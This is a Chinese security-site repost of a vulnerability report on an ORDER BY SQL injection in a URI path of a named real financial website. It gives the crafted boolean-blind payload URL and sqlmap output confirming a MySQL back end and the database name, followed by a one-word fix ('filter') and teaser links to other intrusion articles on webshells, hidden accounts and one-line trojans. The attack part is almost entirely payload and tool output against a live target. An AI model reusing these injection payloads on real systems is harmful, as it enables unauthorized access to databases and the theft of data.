当前位置：移动技术网 > 网络运营>安全>网站安全 > 同花顺某站一处URI注入

同花顺某站一处URI注入

2018年01月22日 | 移动技术网网络运营 | 我要评论

URI处的order by注入

原始请求
https://trust.10jqka.com.cn/xtcp/_0_0_0_0_all_yqsyl_desc_1.shtml

desc处存在order by注入，构造payload

https://trust.10jqka.com.cn/xtcp/_0_0_0_0_all_yqsyl_desc,1-if(1=1,1,(select+1+union+select+2))_1.shtml

sqlmap获取数据如下
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: https://trust.10jqka.com.cn:80/xtcp/_0_0_0_0_all_yqsyl_desc,1-if(1=1 AND 7128=7128,1,(select+1+union+select+2))_1.shtml
---
[21:52:58] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[21:52:58] [INFO] testing MySQL

[21:52:58] [INFO] confirming MySQL

[21:52:58] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.0

[21:52:58] [INFO] fetching current database

[21:52:58] [INFO] resumed: invest

current database: 'invest'

[21:52:58] [INFO] fetched data logged to text files under '/root/.sqlmap/output/trust.10jqka.com.cn'

[*] shutting down at 21:52:58

解决方案：

过滤

您可能感兴趣的文章:

如对本文有疑问，点击进行留言回复！！

推荐:对FCBLOG的简单分析

一：古老的OR注入漏洞。看一下首页，做的好凑合。有个登陆的地方，如图1. 二话不说，试’or’=’or’, 点击登陆。没想... [阅读全文]
论坛通用入侵一条龙教学(图)

目前网上有种新的趋势，黑客们的攻击目标开始从网站延伸到论坛和聊天室及留言板等公共场所，而许多用户的论坛密码竟然与E-mail和QQ的密码完全相同，因此对大家的网... [阅读全文]
热门技术探讨之跨站式入侵(图)

最近朋友们老是弄些跨站,一会看这个站被跨站那个站又被跨站,我看也无聊顺便弄一些玩玩,到百度上随便搜索了几个站的地址结果一测试全都可以弄,这不得不让... [阅读全文]
追踪入侵JSP网站服务器

在用JSP制作的电子商务网站多如牛毛。但是对于JSP网站而言，安全性真的能够让人放心吗？面对层出不穷的黑客攻击和病毒袭击，JSP网站的服务器能够比其他网站的服务... [阅读全文]
webshell下执行CMD的小技巧分享

webshell下执行CMD的小技巧分享，需要的朋友可以参考下。... 11-03-31 [阅读全文]
微软全系统建立隐藏账户漏洞分析

命令行下能很好的隐藏，但图形界面下虽然显示为空白，但细心的管理员还是能发现。只为交流学习，不建议搞破坏。... 11-11-11 [阅读全文]
什么是CC攻击，如何防止网站被CC攻击的方法总汇

CC攻击（Challenge Collapsar）是DDOS（分布式拒绝服务）的一种，也是一种常见的网站攻击方法，攻击者通过代理服务器或者肉鸡向向受害主机不停地... [阅读全文]
浅说双引号被过滤时一句话的插入与防范

昨日小刀刀在群里抛了一个问题，说后台插入一句话老是出错，群里的朋友出了很多主意，但是最后还是没搞定。后来这小子把问题抛给了我，昨天我就测试了一下。这里把情况介绍... [阅读全文]
dedecms官方模板包含一句话后门木马

应该是前几天出的那个dedecms的0day.官方的网站被日，然后被在风格模板里面值入了一句话木马。XXOO。... 11-09-29 [阅读全文]
利用ntfs流隐藏你的一句话木马的方法

利用ntfs流隐藏你的一句话木马的方法，好邪恶啊，大家一定要注意防范啊。建议服务器安全设置弄好。... 11-09-29 [阅读全文]

网友评论


验证码：

同花顺某站一处URI注入

2018年01月22日 | 移动技术网网络运营 | 我要评论

解决方案：

您可能感兴趣的文章:

相关文章:

网友评论